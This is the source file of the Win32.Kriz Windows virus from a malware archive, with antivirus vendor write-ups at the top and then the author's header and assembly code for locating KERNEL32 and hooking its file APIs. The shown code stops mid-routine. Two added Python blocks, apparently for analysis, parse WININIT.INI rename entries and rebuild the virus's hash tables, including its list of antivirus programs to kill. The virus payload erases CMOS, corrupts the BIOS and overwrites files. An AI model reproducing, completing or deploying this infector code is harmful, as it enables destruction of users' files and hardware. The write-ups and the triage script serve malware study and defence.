MalwareSourceCode/Win32/Infector/Win32.Kriz.asm
2020-10-16 23:26:21 +02:00

2805 lines
75 KiB
TASM (MASM-style syntax; see the TASM32/TLINK32 assemble line in the source header)

; Fucked up descriptions:
; SYMANTEC
; ---------------------------------------------------------------------------
; W32.KRIZ
;
; Aliases: W32.Kriz.3863, W32.Kriz.3740
; Area of Infection: Windows 9x/NT PE files
; Likelihood: Rare
; Region Reported: Worldwide
; Characteristics: Wild, BIOS, December 25
;
;
; Description:
; W32.Kriz is a Windows 9x/NT virus, which infects Portable Executable (PE)
; Windows files. The virus goes resident into memory, attempting to infect
; any files that are opened by the user or applications. If infected with
; this virus, the user should verify they have "booted clean" before
; attempting to scan and repair files.
;
; The virus also modifies the KERNEL32.DLL. This file must be replaced with
; a known, clean backup. In addition, this virus may corrupt some PE files,
; requiring them to be replaced by known, clean backups (or from the
; installation package).
;
; The W32.Kriz virus also contains a payload, which is executed on December
; 25th.
;
; The first time the virus is executed on a system, it will create an
; infected copy of KERNEL32.DLL in the Windows system directory. The file
; will be named KRIZED.TT6. If this file is found in the Windows system
; directory, it should be deleted. The next time Windows is started, this
; file will be copied over the original KERNEL32.DLL. Then, the virus infects
; other files when certain Windows API functions are called by a program.
;
; There are variants of this virus. Some of the differences between variants
; pertain to the payload. The 3863 variant will access more types of drives
; when overwriting files. Other differences include the method of infection.
; The 3740 variant will create a new section named "…" and copy its viral
; code to that newly created section. The 3863 variant will simply append its
; code to the end of the last section.
;
; Currently, only the 3863 variant has been found in the wild. There is a
; 3863.b version of this virus. It is the same as the 3863 variant except
; that some of the unused text at the end of the virus has been corrupted.
;
; Payload:
; If the system date is December 25th, the virus will attempt to flash the
; BIOS of the computer. This will prevent the computer from booting up
; properly and may require a change of hardware. Information stored in the
; CMOS will be cleared. So the date, time, hard drive and floppy drive
; settings, peripheral configuration, etc. will need to be restored. The
; virus will also begin overwriting files on all available drives. This
; includes mapped network drives, floppy drives and RAM disks. This payload
; is very similar to W95.CIH.
;
;
; Write-up by: Eric Chien
; September 1, 1999
; AVP
; ---------------------------------------------------------------------------
; WIN32.KRIZ
;
; It is a memory resident polymorphic Windows virus. It replicates under
; Windows32 systems and infects PE EXE files (Windows executable) with EXE
; and SCR filename extensions, as well as the Windows KERNEL32.DLL system
; library that allows the virus to stay memory resident during a whole
; Windows session. The virus in infected KERNEL32.DLL hooks files access
; functions, intercepts file copying, opening, moving, etc. and infects
; files that are accessed. The virus checks file names and does not infect
; several anti-virus program files:
;
; _AVP32.EXE, _AVPM.EXE, ALERTSVC.EXE, AMON.EXE, AVP32.EXE, AVPM.EXE,
; N32SCANW.EXE, NAVAPSVC.EXE, NAVAPW32.EXE, NAVLU32.EXE, NAVRUNR.EXE,
; NAVWNT.EXE, NOD32.EXE, NPSSVC.EXE, NSCHEDNT.EXE, NSPLUGIN.EXE,
; SCAN.EXE, SMSS.EXE
;
; The virus has an extremely dangerous payload that is activated on December
; 25th. On this day when infecting any file (i.e. when they are accessed by
; any of the Windows functions listed below), the virus "kills" information
; stored in CMOS memory, overwrites data in all files on all available
; drives, and then messes-up the Flash BIOS by using the same routine that
; was found in the "Win95.CIH" virus (aka Chernobyl).
;
; When an infected file is run, the virus' polymorphic decryption loop takes
; control and restores the virus code back to its original form. The virus
; then scans the Windows32 kernel, gets addresses of necessary Windows
; functions and calls the KERNEL32 infection routine.
;
; While infecting a file the virus creates a new file section at the end of
; the file, encrypts and writes its code to there. To separate infected and
; not yet infected files the virus writes the "666" ID string to the PE file
; header reserved field. The virus section has the "..." name.
;
; While infecting the KERNEL32.DLL module the virus also patches its Export
; table (exported functions) and modifies several functions' addresses so,
; that on next Windows startup the calls to KERNEL32 function will be
; filtered by virus hooks. That allows the virus to monitor file access
; calls.
;
; The virus hooks 16 KERNEL32 functions - file opening, copying, deleting,
; reading/writing file attributes, creating a new process. The complete list
; of hooked functions looks as follows:
;
; CopyFileA CopyFileW
; CreateFileA CreateFileW
; DeleteFileA DeleteFileW
; MoveFileA MoveFileExA MoveFileW MoveFileExW
; GetFileAttributesA SetFileAttributesW
; SetFileAttributesA SetFileAttributesExA
; CreateProcessA CreateProcessW
;
; To infect the KERNEL32.DLL file that can be opened in read-only mode only,
; the virus uses a standard trick. It copies this file with temporary name
; (this copy has KRIZED.TT6 name and it is created in the Windows system
; directory), infects it and writes "rename" instruction to the WININIT.INI
; file. This trick allows the virus to infect the copy of KERNEL32.DLL and
; force Windows to replace the original KERNEL32.DLL with infected copy on
; next startup.
;
; The virus contains internal text strings that are not used in any way:
;
; =( [c] 1999 [t] )=
;
; YOU CALL IT RELIGION, YOU'RE FULL OF SHIT
; YOU NEVER KNEW, YOU NEVER DID, YOU NEVER WILL
; YOU'RE SO FULL OF SHIT, I DON'T WANT TO HEAR IT
; ALL YOU DO IS TALK ABOUT YOURSELF
; I DON'T WANNA HEAR IT, COZ I KNOW NONE OF IT'S TRUE
; I'M SICK AND TIRED OF ALL YOUR GODDAMN LIES
; LIES IN THE NAME OF GOD
; WHEN ARE YOU GOING TO REALIZE THAT I DON'T WANT TO HEAR IT?!
; I KNOW YOU'RE SO FULL OF SHIT, SO SHUT YOUR FUCKING MOUTH
; YOU KEEP ON TALKING, TALKING EVERYDAY
; FIRST YOU'RE TELLING STORIES, THEN YOU'RE TELLING LIES
; WHEN THE FUCK ARE YOU GOING TO REALIZE THAT I DON'T WANT TO HEAR IT!!
; AH, SHUT THE FUCK UP...
;
; KRIZ.3862
;
; This virus version is very closely related to the original one and differs
; only by additional programming tricks, another "copyright" text string:
;
; (c) T2 & Immortal Riot
;
; and an improved disk erasing routine: in addition to erasing CMOS, Flash
; and files on logical drives this virus enumerates all available network
; drives and erases all files on them. While erasing files the virus
; truncates them and overwrites them with the "DEAD BEEF" hexadecimal string
; (DEADBEEFh).
;
; KRIZ.4029
;
; This virus version is very closely related to the previous one
; ("Kriz.3836"). The differences are: some routines were improved; the
; destruction routine is also activated if the SoftIce debugger is installed
; in the system; the "copyright" text was also changed:
;
; T-2000 / Immortal Riot
;
; Text added: June-30-1999
; New variant Win32.Kriz.3862: August-18-1999
; More information about Kriz.3862 added: August-23-1999
; Kriz.4029 desc. added: September-05-1999
; PANDA
; ---------------------------------------------------------------------------
; CMOS AND FLASH MEMORIES: PRIME OBJECTIVES OF WIN32.KRIZ
;
; Panda detects and eliminates this virus, and it is the only developer
; capable of disinfecting the Kernel32.DLL library file.
;
; SAN FRANCISCO, August, 27th, 1999 -- Win32.Kriz is a resident polymorphic
; virus that runs under all Win32 platforms (Windows 95, Windows 98 and
; Windows NT) and infects Windows executable files (EXE extensions), screen
; saver files (SCR extensions) and the KERNEL32.DLL system library. Although
; its polymorphic generation routine is quite simple, the virus hides several
; programming tricks up its sleeve to complicate its debugging.
;
; Win32.Kriz's destructive payload is produced on the 25th of December. If,
; on that day, more than 256 infected EXE or SCR files have been accessed,
; the virus deletes the CMOS memory (which contains, among other information,
; data concerning the date, time, type of hard disk, etc.), damages the FLASH
; memory and overwrites all files contained in any network drive.
;
; The first time a file infected by Win32.Kriz is executed in a clean system,
; the polymorphic routine takes over and decrypts the remaining virus code
; in order to subsequently scan the resident area of KERNEL32 to locate the
; addresses of the following API's:
;
; CopyFileA, CreateFileA, CreateProcessA, DeleteFileA, GetFileAttributesA,
; MoveFileA, MoveFileExA, SetFileAttributesA, CopyFileW, CreateFileW,
; CreateProcessW, DeleteFileW, GetFileAttributesW, MoveFileW, MoveFileExW,
; SetFileAttributesW, CloseHandle, CreateFileMappingA, FindClose,
; FindFirstFileA, FindNextFileA, FreeLibrary, GetCurrentDirectory,
; GetDriveTypeA, GetFileSize, GetLocalTime, GetLogicalDriveStringsA,
; GetProcAddress, GetSystemDirectoryA, GetTickCount, GetWindowsDirectory,
; GlobalAlloc, GlobalFree, LoadLibraryA, MapViewOfFile, SetCurrentDirectory,
; SetFileTime, UnmapViewOfFile, WriteFile, WritePrivateProfile.
;
; The virus calculates the CRC16 of the name of the APIs that the KERNEL32
; exports and compares them with the list of the ones it needs to
; subsequently infect the KERNEL32.DLL file. It then overwrites the position
; of these APIs with the corresponding addresses of the viral routines.
;
; Win32.Kriz copies the KERNEL32.DLL file (from the c:\windows\system
; directory), renames it as KRIZED.TT6 and infects it, calculating the file's
; checksum correctly so that it does not generate any execution problems
; under Windows NT. Once the KRIZED.TT6 temp file has been infected, the
; virus creates a WININIT.INI file that automatically replaces the original
; KERNEL32.DLL file with the new infected copy. This way, upon the next
; system startup, Win32.Kriz will remain resident throughout the entire
; session, even if no other infected file is executed. In the first session,
; the virus is not resident in memory and will not infect any files as long
; as the system is not restarted. Then, when the system is booted with an
; infected copy of the KERNEL32.DLL file, Win32.Kriz will attack any file
; that is accessed (upon copying, moving, running, creating or attribute
; modification) after the APIs that were intercepted are called.
;
; Win32.Kriz contains the following text:
;
; (c) T2 & Immortal Riot
;
; YOU CALL IT RELIGION, YOU'RE FULL OF SHIT
; YOU NEVER KNEW, YOU NEVER DID, YOU NEVER WILL
; YOU'RE SO FULL OF SHIT, I DON'T WANT TO HEAR IT
; ALL YOU DO IS TALK ABOUT YOURSELF
; I DON'T WANNA HEAR IT, COZ I KNOW NONE OF IT'S TRUE
; I'M SICK AND TIRED OF ALL YOUR GODDAMN LIES
; LIES IN THE NAME OF GOD
; WHEN ARE YOU GOING TO REALIZE THAT I DON'T WANT TO HEAR IT?!
; I KNOW YOU'RE SO FULL OF SHIT, SO SHUT YOUR FUCKING MOUTH
; YOU KEEP ON TALKING, TALKING EVERYDAY
; FIRST YOU'RE TELLING STORIES, THEN YOU'RE TELLING LIES
; WHEN THE FUCK ARE YOU GOING TO REALIZE THAT I DON'T WANT TO HEAR IT!!
; AH, SHUT THE FUCK UP...
;
; Panda detects and eliminates Win32.Kriz, thereby protecting users against
; this virus, which is a harmful threat to their systems. In addition, Panda
; is the only antivirus developer capable of disinfecting the Kernel32.DLL
; library file. For this, the computer must be booted in MS-DOS mode, since
; the affected files are used by Windows upon computer startup.
; NAI
; ---------------------------------------------------------------------------
; VIRUS NAME
; W32/Kriz.3862
;
; DATE ADDED
; 8/16/99
;
; VIRUS CHARACTERISTICS
; This is Windows 95/98 and NT virus that infects PE EXE files. It is also
; polymorphic. When an infected file is executed, this virus will stay
; resident in memory until the next time the system is rebooted. This virus
; encrypts its code, leaving only a small random decryptor. This virus will
; infect files as they are opened by any application while it is in memory.
; This will occur when a user scans files as well.
;
; The virus also has a payload which activates when an infected file is run
; on December 25th. When it does it will attempt to erase the computer's CMOS
; information, which contains information such as date and time, and the type
; of hard disk the computer uses. This virus will also attempt to directly
; erase disk sectors. It will attempt to flash the BIOS with garbage. This
; only works on certain types of BIOSes. If this succeeds, the computer will
; not boot. This is similar to the action taken by the CIH virus. If the
; virus is successful the computer will not boot up, not even from a floppy
; disk. In some cases the virus will corrupt the file it infects and cleaning
; may not be possible.
;
; This virus will infect kernel32.dll. When it does, it replaces the original
; contents with its own. Because of this the file can NOT be repaired, it
; must be replaced.
;
; This virus code also contains a poem that contains quite a bit of
; profanity. It is never displayed, nor is it used in any of the routines
; it runs.
;
; INDICATIONS OF INFECTION
; Not Available...
;
; METHOD OF INFECTION
; When first run on a clean machine, the virus checks KERNEL32.DLL to see if
; it is infected, if yes then the virus exits. If KERNEL32.DLL is not
; infected then the virus copies KERNEL32.DLL to WINDOWS\SYSTEM\KRIZED.TT6
; and then the virus infects this local copy. The virus then creates the file
; WINDOWS\WININIT.INI containing the lines :-
;
; [rename]
; C:\WINDOWS\SYSTEM\KERNEL32.DLL=C:\WINDOWS\SYSTEM\KRIZED.TT6
;
; This causes windows to replace KERNEL32.DLL with the infected copy when the
; system is next re-started. In the infected copy of KERNEL32.DLL the virus
; hooks the following functions :-
;
; CopyFileA
; CopyFileW
; CreateFileA
; CreateFileW
; CreateProcessA
; CreateProcessW
; DeleteFileA
; DeleteFileW
; GetFileAttributesA
; GetFileAttributesW
; MoveFileA
; MoveFileW
; MoveFileExA
; MoveFileExW
; SetFileAttributesA
; SetFileAttributesW
;
; This causes any PE executable file that is run, copied, moved or scanned to
; be infected by the virus.
;
; VIRUS INFORMATION
; DISCOVERY DATE: 8/16/99
; TYPE: Win32
; RISK ASSESSMENT: medium-AvertWatch List
; MINIMUM DAT: 4039
;
; VARIANTS
; Unknown
;
; ALIASES
; Kriz
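; The [rename] mechanism NAI describes is also used by legitimate installers, so a
; responder needs a triage filter rather than a blanket alert. The Python below is
; an added example, not from the write-up or from the virus source: it parses a
; constructed WININIT.INI (sample input, not taken from a real host) and flags the
; entries that replace or delete a core system DLL. Assumed: the 'destination=source'
; line format shown in the write-up and the NUL= convention for deletions; the
; PROTECTED set is a choice made for the example.

```python
"""Triage the [rename] section of a WININIT.INI (added example; constructed input)."""
import ntpath

# Constructed sample: a benign installer cleanup, the Kriz entry quoted in the
# NAI write-up, and a look-alike that touches a non-core DLL.
SAMPLE_WININIT_INI = """\
; Windows processes this file once at startup, before KERNEL32.DLL is in use
[rename]
NUL=C:\\WINDOWS\\TEMP\\SETUP1.TMP
C:\\WINDOWS\\SYSTEM\\KERNEL32.DLL=C:\\WINDOWS\\SYSTEM\\KRIZED.TT6
C:\\WINDOWS\\SYSTEM\\MSVCRT.DLL=C:\\WINDOWS\\TEMP\\MSVCRT.NEW
[other]
ignored=1
"""

# Core DLLs no ordinary application update should swap out through this mechanism
# (assumed set for the example; extend it to taste).
PROTECTED = {"KERNEL32.DLL", "USER32.DLL", "GDI32.DLL", "ADVAPI32.DLL"}


def parse_rename_section(text: str) -> list:
    """Return (destination, source) pairs from [rename]; 'NUL=' marks a deletion."""
    entries, in_rename = [], False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("["):
            in_rename = line.lower() == "[rename]"
            continue
        if in_rename and "=" in line:
            dest, src = (part.strip() for part in line.split("=", 1))
            entries.append((dest, src))
    return entries


def suspicious_renames(text: str) -> list:
    """Entries that overwrite or delete a protected DLL, each with a short reason."""
    hits = []
    for dest, src in parse_rename_section(text):
        dest_name = ntpath.basename(dest).upper()
        src_name = ntpath.basename(src).upper()
        if dest_name == "NUL" and src_name in PROTECTED:
            hits.append((dest, src, "deletes %s" % src_name))
        elif dest_name in PROTECTED:
            hits.append((dest, src, "replaces %s with %s" % (dest_name, src_name)))
    return hits


if __name__ == "__main__":
    for dest, src, why in suspicious_renames(SAMPLE_WININIT_INI):
        print("%-40s <- %-40s %s" % (dest, src, why))
```

; On a live system the file to read is %WINDIR%\WININIT.INI, and the hit for
; KERNEL32.DLL should be paired with a check for the KRIZED.TT6 copy it names.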
; ZDNN (some PC news site)
; ---------------------------------------------------------------------------
; 'CHRISTMAS' VIRUS CAN DESTROY PCs
;
; New virus set to hit Dec. 25, delivering a payload that can kill a Windows
; PC's BIOS. Is it as bad as CIH?
;
; By Bob Sullivan, MSNBC
; August 18, 1999 3:00 PM PT
;
; A nasty new virus discovered by researchers promises to do even more damage
; to victims than the Chernobyl virus. It has the ability not only to erase
; files, but also to render a PC useless by destroying its flash BIOS.
;
; The good news is it won't execute until Dec. 25; the bad news is PC users
; without anti-virus programs may have a very bad Christmas Day.
;
; The author of Win32.Kriz, discovered recently by researchers, sounds as if
; he or she has an ax to grind against religious folks.
;
; Inside the virus is a text string with a poem full of expletives
; criticizing those who preach religion: "I don't wanna hear it, coz I know
; none of it's true," the author writes, according to anti-virus research
; firm Kaspersky Lab.
;
; Victims of the virus -- who can be anyone using Windows 95, Windows 98 or
; Windows NT -- can expect a load of trouble. The virus kills the CMOS
; memory, overwrites data in all files on all available drives, and then
; destroys the flash BIOS by using the same routine that was found in the
; "Win95_CIH" virus, also known as Chernobyl.
;
; "This is a nasty one, very well written," said Dan Takata of anti-virus
; vendor Data Fellows Inc.
;
; He said it's too early to tell if the virus will be widespread -- but
; potential victims have until Dec. 25 to update their antivirus programs
; against it.
; AVP PRESS
; ---------------------------------------------------------------------------
; New Windows Virus Named Win32.Kriz.3740 Discovered
;
; Attacks Executable and Screen Saver Files
;
; Medina, OH August 18, 1999 -- Central Command and Kaspersky Lab announce
; the discovery of a new Windows virus that contains same destructive payload
; as the Chernobyl virus that rendered thousands of computers in Asia
; unusable.
;
; Named Win32.Kriz.3740, the virus contains even more deadly capacity than
; the original Chernobyl virus. The Win32.Kriz.3740 virus, on December 25th,
; erases the CMOS memory, overwrites data in all files on all available
; drives, and then destroys the Flash BIOS by using the same routine that was
; found in the Win95.CIH virus (aka Chernobyl virus).
;
; Win32.Kriz.3740 is a memory resident, polymorphic, Windows virus. It
; replicates under Windows 95, Windows 98, and Windows NT systems and infects
; Windows programs with EXE (executable) and SCR (screen savers) filename
; extensions, as well as Windows KERNEL32.DLL system library that allows the
; virus to stay memory resident during the entire Windows session.
; SOPHOS
; ---------------------------------------------------------------------------
; VIRUS NAME: W32/Kriz.
; ALIASES: Kriz, W32.Kriz.3740, Win32.Kriz.
; TYPE: PE executable virus.
; RESIDENT: Yes.
; STEALTH: No.
; DESCRIPTION: This virus, which works under Windows 95/98 and Windows NT,
; infects PE (Portable Executable) files with .EXE or .SCR
; extensions. It also infects KERNEL32.DLL.
;
; W32/Kriz has a particularly destructive payload. On December
; 25th it will erase the CMOS setup, attempt to corrupt the
; system BIOS (in a similar way to W95/CIH-10xx) and attempt to
; overwrite all files on all local hard disks and network drives
; with garbage.
;
; If the system BIOS corruption is successful you will no longer
; be able to use your computer, and the BIOS chip may need to be
; replaced.
;
; There are two known variants of this virus, but only one of
; these is known to be in the wild.
; Note, all bugs mentioned in the articles above have been fixed.
; Source:
;============================================================================
;
;
; NAME: Win32.Krized v1.666
; TYPE: Parasitic resident polymorphic K32/PE-infector.
; OS: Windoze 95/98/NT/2000.
; CPU: 386+
; SIZE: Around 4k.
; AUTHOR: T-2000 / Immortal Riot.
; E-MAIL: T2000_@hotmail.com
; DATE: April 1999 - August 1999.
; PAYLOAD: Judgement Day on X-mas.
;
;
; FEATURES:
;
; - Completely Win32-compatible.
; - Achieves global Win32-residency by kernel-infection.
; - Polymorphic encrypted in files (PE/K32).
; - Traps possible errors with SEH's.
; - Anti-debugger/disassembler/emulator code.
; - Calculates correct image-checksum when needed.
; - Kills various AV-programs.
; - Win9x-payload: ring-0 CMOS & BIOS-trashing.
; - Win32-payload: local & network drive-trashing.
;
;
; Successfully tested under Windoze 95, 98, NT 4.0, and 2000 beta 3.
;
; Creds go to Johnny Panic for the CRC-routines, to CIH for the
; BIOS-nuker, and to Rude Boy for the image-checksum algorithm.
;
; Assemble with: TASM32 KRIZED.ASM /ml /m
; TLINK32 KRIZED.OBJ IMPORT32.LIB
;
; Greets to Metal Militia, The Unforgiven, Johnny Panic, Bad Spirit,
; Godlike, Retch, The Lich, LovinGod, Vendigo, Morphine, and Lord Julus.
;
;============================================================================
ORG 0
.386p
.MODEL FLAT
; Stuff our code in the data-section, which is already
; readable/writeable, so we don't have to manually set
; the write-bit to the code-section anymore.
.DATA
; Some exports, only used by the carrier.
EXTRN ExitProcess:PROC
EXTRN GetFileAttributesA:PROC
EXTRN MessageBoxA:PROC
; *** Various equates we use. ***
GENERIC_READ EQU 80000000h
GENERIC_WRITE EQU 40000000h
OPEN_EXISTING EQU 00000003h
FILE_ATTRIBUTE_NORMAL EQU 00000080h
PAGE_READONLY EQU 00000002h
PAGE_READWRITE EQU 00000004h
FILE_MAP_READ EQU 00000004h
FILE_MAP_WRITE EQU 00000002h
EWX_REBOOT EQU 00000002h
EWX_FORCE EQU 00000004h
MOVEFILE_REPLACE_EXISTING EQU 00000001h
MOVEFILE_DELAY_UNTIL_REBOOT EQU 00000004h
ERROR_ACCESS_DENIED EQU 00000005h
RESOURCE_CONNECTED EQU 00000001h
RESOURCETYPE_DISK EQU 00000001h
DRIVE_REMOVABLE EQU 00000002h
DRIVE_CDROM EQU 00000005h
DRIVE_RAMDISK EQU 00000006h
Virus_Size EQU (Virus_End-START)
Poly_Size EQU 200 ; Maximum size of generated
; polymorphic decryptors.
Work_API_Count EQU (End_Work_API_CRC-Work_API_CRC) / 2
Hook_API_Count EQU (Work_API_CRC-Hook_API_CRC) / 2
Kill_CRC_Count EQU (End_Kill_Table-Kill_Table) / 2
; Equates used to index the API address table.
ixCopyFileA EQU 00
ixCreateFileA EQU 01
ixCreateProcessA EQU 02
ixDeleteFileA EQU 03
ixGetFileAttributesA EQU 04
ixMoveFileA EQU 05
ixMoveFileExA EQU 06
ixSetFileAttributesA EQU 07
ixCopyFileW EQU 08
ixCreateFileW EQU 09
ixCreateProcessW EQU 10
ixDeleteFileW EQU 11
ixGetFileAttributesW EQU 12
ixMoveFileW EQU 13
ixMoveFileExW EQU 14
ixSetFileAttributesW EQU 15
ixCloseHandle EQU 16
ixCreateFileMappingA EQU 17
ixFindClose EQU 18
ixFindFirstFileA EQU 19
ixFindNextFileA EQU 20
ixGetCurrentDirectoryA EQU 21
ixGetDriveTypeA EQU 22
ixGetFileSize EQU 23
ixGetFileTime EQU 24
ixGetLastError EQU 25
ixGetLocalTime EQU 26
ixGetLogicalDriveStringsA EQU 27
ixGetProcAddress EQU 28
ixGetSystemDirectoryA EQU 29
ixGetTickCount EQU 30
ixGetWindowsDirectoryA EQU 31
ixGlobalAlloc EQU 32
ixGlobalFree EQU 33
ixLoadLibraryA EQU 34
ixMapViewOfFile EQU 35
ixSetCurrentDirectoryA EQU 36
ixSetFileTime EQU 37
ixUnmapViewOfFile EQU 38
ixWriteFile EQU 39
ixWritePrivateProfileStringA EQU 40
CRC16 MACRO String
CRC_Reg = 0FFFFFFFFh
IRPC _x, <String>
Ctrl_Byte = ('&_x&' XOR (CRC_Reg AND 0FFh))
CRC_Reg = (CRC_Reg SHR 8)
REPT 8
Ctrl_Byte = (Ctrl_Byte SHR 1) XOR (0EDB88320h * (Ctrl_Byte AND 1))
ENDM
CRC_Reg = (CRC_Reg XOR Ctrl_Byte)
ENDM
DW (CRC_Reg AND 0FFFFh)
ENDM
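; The CRC16 macro above is the hash that Loop_Export compares against
; Hook_API_CRC/Work_API_CRC and that the filename check compares against Kill_Table.
; The Python below is an added example, not part of the virus source: it ports the
; macro step for step, shows it is ordinary CRC-32 without the final inversion
; (cross-checked against zlib), and rebuilds the three tables. Assumptions: the
; runtime Calculate_CRC16 routine computes the same value as the macro (the table
; lookups require it), the table entries hash the API names as spelled in the ix*
; equates, and Kill_Table hashes the uppercase filenames listed in the AVP write-up.

```python
"""Reproduces Win32.Kriz's CRC16 macro and rebuilds its lookup tables (added example)."""
import zlib

# Index order of the ix* equates: 16 hooked exports, then 25 worker APIs.
HOOKED_APIS = [
    "CopyFileA", "CreateFileA", "CreateProcessA", "DeleteFileA",
    "GetFileAttributesA", "MoveFileA", "MoveFileExA", "SetFileAttributesA",
    "CopyFileW", "CreateFileW", "CreateProcessW", "DeleteFileW",
    "GetFileAttributesW", "MoveFileW", "MoveFileExW", "SetFileAttributesW",
]
WORK_APIS = [
    "CloseHandle", "CreateFileMappingA", "FindClose", "FindFirstFileA",
    "FindNextFileA", "GetCurrentDirectoryA", "GetDriveTypeA", "GetFileSize",
    "GetFileTime", "GetLastError", "GetLocalTime", "GetLogicalDriveStringsA",
    "GetProcAddress", "GetSystemDirectoryA", "GetTickCount",
    "GetWindowsDirectoryA", "GlobalAlloc", "GlobalFree", "LoadLibraryA",
    "MapViewOfFile", "SetCurrentDirectoryA", "SetFileTime", "UnmapViewOfFile",
    "WriteFile", "WritePrivateProfileStringA",
]
# Anti-virus process names the virus deletes (as listed in the AVP write-up).
AV_KILL_LIST = [
    "_AVP32.EXE", "_AVPM.EXE", "ALERTSVC.EXE", "AMON.EXE", "AVP32.EXE",
    "AVPM.EXE", "N32SCANW.EXE", "NAVAPSVC.EXE", "NAVAPW32.EXE", "NAVLU32.EXE",
    "NAVRUNR.EXE", "NAVWNT.EXE", "NOD32.EXE", "NPSSVC.EXE", "NSCHEDNT.EXE",
    "NSPLUGIN.EXE", "SCAN.EXE", "SMSS.EXE",
]


def kriz_crc16(data: bytes) -> int:
    """Step-for-step port of the CRC16 macro: CRC-32 register, poly EDB88320h,
    init FFFFFFFFh, no final inversion, truncated to its low 16 bits."""
    reg = 0xFFFFFFFF
    for byte in data:
        ctrl = byte ^ (reg & 0xFF)
        reg >>= 8
        for _ in range(8):
            ctrl = (ctrl >> 1) ^ (0xEDB88320 * (ctrl & 1))
        reg ^= ctrl
    return reg & 0xFFFF


def matches_zlib(data: bytes) -> bool:
    """Cross-check: the macro is plain CRC-32 minus the final XOR with FFFFFFFFh."""
    return kriz_crc16(data) == ((zlib.crc32(data) ^ 0xFFFFFFFF) & 0xFFFF)


def build_hash_table(names) -> dict:
    """hash -> [names]; a list per hash so a 16-bit collision is visible, not hidden."""
    table = {}
    for name in names:
        table.setdefault(kriz_crc16(name.encode("ascii")), []).append(name)
    return table


def label_word(table: dict, word: int) -> list:
    """Resolve one DW from Hook_API_CRC / Work_API_CRC / Kill_Table to its name(s)."""
    return table.get(word & 0xFFFF, [])


def kill_list_hash(filename: str) -> int:
    """Convert_Path uppercases the candidate's path before Calculate_CRC16 runs,
    so Kill_Table has to be built from uppercase names."""
    return kriz_crc16(filename.upper().encode("ascii"))


def dump_tables() -> dict:
    """The three DW tables in the order the equates index them."""
    return {
        "Hook_API_CRC": [kriz_crc16(n.encode("ascii")) for n in HOOKED_APIS],
        "Work_API_CRC": [kriz_crc16(n.encode("ascii")) for n in WORK_APIS],
        "Kill_Table": [kill_list_hash(n) for n in AV_KILL_LIST],
    }


if __name__ == "__main__":
    for table_name, words in dump_tables().items():
        print(table_name, " ".join("%04Xh" % w for w in words))
```

; Because Hook_API_Count/Work_API_Count are derived from table length and SCASW
; returns a position, the position in Hook_API_CRC is what indexes API_Addresses,
; so the table order above is part of the format, not just a convenience.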
; === VIRUSCODE STARTS HERE ===
START:
CALL Get_Delta
XOR EDX, EDX ; Zero EDX.
JNZ $+31337 ; Simple anti-heuristic.
; Zero the key of the decryptor, so the
; code won't be fucked-up the next time
; DllMain gets called.
MOV [EBP+(Stupid_Dummy-START)], DL
Patch_Decrypt = DWORD PTR $-4
MOV EAX, EBP
SUB EAX, 1000h ; Calculate our base-address.
Virus_RVA = DWORD PTR $-4
; Calculate VA of our host.
ADD EAX, (1000h+(Carrier-START))
Host_EIP = DWORD PTR $-4
MOV [ESP+(9*4)], EAX ; Patch return-address with
; original entrypoint.
JMP CALL_Setup_SEH ; Abort further processing?
Init_Mode = BYTE PTR $-1
JMP Return_To_Host
CALL_Setup_SEH: CALL Setup_Load_SEH ; Bump SEH-address on stack.
MOV ESP, [ESP+(2*4)] ; Restore original ESP.
JMP_R_Init_SEH: JMP Rest_Init_SEH ; And end further processing.
Author DB 'T-2000 / Immortal Riot', 0
Setup_Load_SEH: PUSH DWORD PTR FS:[EDX] ; Bump original SEH on stack.
MOV FS:[EDX], ESP ; Stuff our own SEH-address.
MOV EAX, [ESP+(12*4)] ; Get pointer to last SEH.
XOR AX, AX ; Align on a 64k boundary.
Find_K32_Base: CMP EAX, 400000h ; Below application-memory?
JB JMP_R_Init_SEH
CMP [EAX.MZ_Mark], 'ZM' ; Found the kernel?
JNE Loop_Find_K32
CMP [EAX.MZ_Reloc_Table], 40h ; K32 has a PE-header.
JB Loop_Find_K32
MOV EBX, [EAX+3Ch] ; RVA of PE-header.
ADD EBX, EAX ; Plus base, (make it a VA).
CMP [EBX.PE_Mark], 'EP' ; Verify PE-header, just in
JNE Loop_Find_K32 ; case.
; Verify it's a DLL we've found.
TEST BYTE PTR [EBX.PE_Flags+1], 00100000b
JNZ Found_K32_Base
Loop_Find_K32: SUB EAX, 65536 ; Scan downwards, stuff
; always gets loaded at
; a 64k boundary.
JMP Find_K32_Base ; Just repeat the loop.
Found_K32_Base: MOV [EBP+(K32_Base-START)], EAX ; Store K32-base.
PUSH [EBX.Image_Size]
POP DWORD PTR [EBP+(K32_Image_Size-START)]
MOV EBX, [EBX+120] ; K32's export-table.
ADD EBX, EAX
MOV EDI, [EBX+(8*4)] ; Array of API-name RVA's.
ADD EDI, EAX
MOV ECX, [EBX+(6*4)] ; Amount of API-name RVA's.
MOV BYTE PTR [EBP+(Fetched_API-START)], (Hook_API_Count + Work_API_Count)
Loop_Export: MOV ESI, [EDI+(EDX*4)] ; Offset of API-name.
ADD ESI, EAX
PUSHAD
XCHG ECX, EAX ; Save base-address in ECX.
CALL Calculate_CRC16 ; Calculate the CRC16 of this
; API-name.
MOV ESI, [EBX+(9*4)] ; Array of API-ordinals.
ADD ESI, ECX
MOV EBX, [EBX+(7*4)] ; Array of API-handler RVA's.
PUSH EAX
MOVZX EAX, WORD PTR [ESI+(EDX*2)]
LEA ESI, [EBX+(EAX*4)]
POP EAX
MOV EBX, [ECX+ESI]
; NAV 9x seems to fuck around with the K32 memory image setting its own
; export hooks, for example CreateProcessA and WinExec. Anyways, Krized
; would use hardcoded hooked addresses, and the next boot everything goes
; bang cuz NAV ain't loaded yet. To test for hooked addresses we check if
; the address is in range of the K32-image, and abort infect if it's not.
CMP EBX, 12345678h
K32_Image_Size = DWORD PTR $-4
JNB Rep_Loop_Name
; Check if it's an API which we need.
LEA EDI, [EBP+(Hook_API_CRC-START)]
PUSH (Hook_API_Count+Work_API_Count)
POP ECX
PUSH ECX
REPNE SCASW
POP EAX
JNE Rep_Loop_Name
SUB EAX, ECX
; Save API-address.
MOV [EBP+(API_Addresses-START)+(EAX*4)-4], EBX
; Got another one.
DEC BYTE PTR [EBP+(Fetched_API-START)]
CMP AL, Hook_API_Count+1 ; Do we need to save this
JNB Rep_Loop_Name ; API's export-address?
MOV [EBP+(Hook_Exports-START)+(EAX*4)-4], ESI
Rep_Loop_Name: POPAD
INC EDX
LOOP Loop_Export
JECXZ @1
DB 0E9h
